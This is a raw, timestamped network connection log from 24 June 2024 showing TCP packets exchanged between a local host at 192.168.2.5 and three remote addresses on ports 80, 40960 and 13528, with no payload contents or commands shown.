Jun 24, 2024 00:10:07.320121050 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.320121050 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.320133924 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.320146084 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.320168972 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.320192099 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.320374012 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.320420980 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.320430040 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.320473909 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.320539951 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.320550919 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.320561886 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.320597887 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.320621967 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.320872068 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.320883989 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.320894003 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.320938110 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.320967913 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.321484089 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.321496010 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.321544886 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.342140913 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.342169046 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.342181921 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.342194080 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.342207909 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.342221022 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.342235088 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.342247009 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.342253923 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.342297077 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.342297077 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.382853031 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.382868052 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.382888079 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.382909060 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.382921934 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.382935047 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.382946014 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.382958889 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.383074045 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.383079052 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.383079052 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.383079052 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.383085012 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.383095980 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.383109093 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.383121014 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.383121967 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.383152008 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.383168936 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.383279085 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.383291006 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.383301973 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.383315086 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.383327961 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.383331060 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.383339882 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.383359909 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.383382082 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.383414030 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.383465052 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.383465052 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.383507967 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.412400961 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.412417889 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.412430048 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.412462950 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.412475109 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.412498951 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.412508965 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.412617922 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.412617922 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.412617922 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.412704945 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.412717104 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.412728071 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.412738085 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.412750959 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.412755013 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.412763119 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.412775040 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.412787914 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.412787914 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.412801981 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.412807941 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.412813902 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.412830114 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.412856102 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.413350105 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413362026 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413373947 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413386106 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413398027 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413398027 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.413408041 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413419962 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413431883 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413433075 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.413443089 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413455009 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413465977 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413472891 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.413476944 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413486958 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413494110 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.413499117 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413511038 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413515091 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.413522959 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413535118 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413537025 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.413547039 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413558006 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.413558960 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413570881 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413583040 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413593054 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.413594961 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.413626909 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.413644075 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.414278030 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.414289951 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.414299965 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.414315939 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:07.414325953 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.414350986 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.414371967 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:07.741121054 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:07.787070036 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:07.792321920 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:08.077476025 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:08.121578932 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:08.257788897 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:08.258068085 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:08.262939930 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:08.262958050 CEST	80	49706	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:08.263020992 CEST	49706	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:08.263031006 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:08.289482117 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:08.294639111 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:08.594505072 CEST	49709	13528	192.168.2.5	4.185.27.237
Jun 24, 2024 00:10:08.600142002 CEST	13528	49709	4.185.27.237	192.168.2.5
Jun 24, 2024 00:10:08.600230932 CEST	49709	13528	192.168.2.5	4.185.27.237
Jun 24, 2024 00:10:08.608046055 CEST	49709	13528	192.168.2.5	4.185.27.237
Jun 24, 2024 00:10:08.612826109 CEST	13528	49709	4.185.27.237	192.168.2.5
Jun 24, 2024 00:10:08.943099976 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:08.943200111 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:08.946429014 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:08.951200008 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.156897068 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.156923056 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.156933069 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.156944036 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.156955004 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.156970978 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.156995058 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.157017946 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.157030106 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.157033920 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.157046080 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.157059908 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.157067060 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.157078981 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.157083988 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.157105923 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.157123089 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.157759905 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.157804012 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.161930084 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.161952972 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.161993027 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.162013054 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.162017107 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.162064075 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.274039984 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.274080992 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.274091005 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.274154902 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.274166107 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.274313927 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.274332047 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.274404049 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.274418116 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.274429083 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.274457932 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.274476051 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.274483919 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.274494886 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.274506092 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.274529934 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.274557114 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.275260925 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.275306940 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.275316954 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.275317907 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.275342941 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.275367022 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.275369883 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.275379896 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.275391102 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.275403023 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.275420904 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.275440931 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.276144981 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.276190996 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.276191950 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.276204109 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.276227951 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.276242018 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.276288986 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.276299000 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.276309013 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.276333094 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.276357889 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.277101994 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.277148008 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.392086029 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.392102003 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.392180920 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.392203093 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.392215014 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.392226934 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.392251015 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.392270088 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.392364979 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.392375946 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.392386913 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.392398119 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.392410994 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.392446041 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.392858982 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.392930984 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.392991066 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.393002033 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.393012047 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.393037081 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.393053055 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.393063068 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.393094063 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.393119097 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.393130064 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.393141031 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.393170118 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.393198967 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.393841028 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.393892050 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.393894911 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.393906116 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.393934965 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.393945932 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.393992901 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.394002914 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.394015074 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.394026041 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.394040108 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.394069910 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.394762993 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.394782066 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.394792080 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.394814014 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.394839048 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.394902945 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.394913912 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.394923925 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.394951105 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.394956112 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.394964933 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.394992113 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.395653009 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.395677090 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.395688057 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.395704031 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.395714045 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.395735025 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.395788908 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.395800114 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.395809889 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.395819902 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.395838022 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.395867109 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.396543026 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.396564960 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.396574974 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.396678925 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.396678925 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.396697044 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.396707058 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.396717072 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.396728992 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.396739960 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.396753073 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.396779060 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.397437096 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.397488117 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.397489071 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.397500038 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.397510052 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.397533894 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.397543907 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.509591103 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.509629011 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.509645939 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.509661913 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.509674072 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.509685040 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.509696007 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.509746075 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.509794950 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.509805918 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.509814978 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.509815931 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.509826899 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.509838104 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.509854078 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.509854078 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.509866953 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.509880066 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.509906054 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.509906054 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.509916067 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.509947062 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.509967089 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.510004997 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510015011 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510025024 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510051012 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.510052919 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510063887 CEST	80	49708	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:09.510071039 CEST	49708	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:09.510094881 CEST	49708	80	192.168.2.5	77.91.77.81
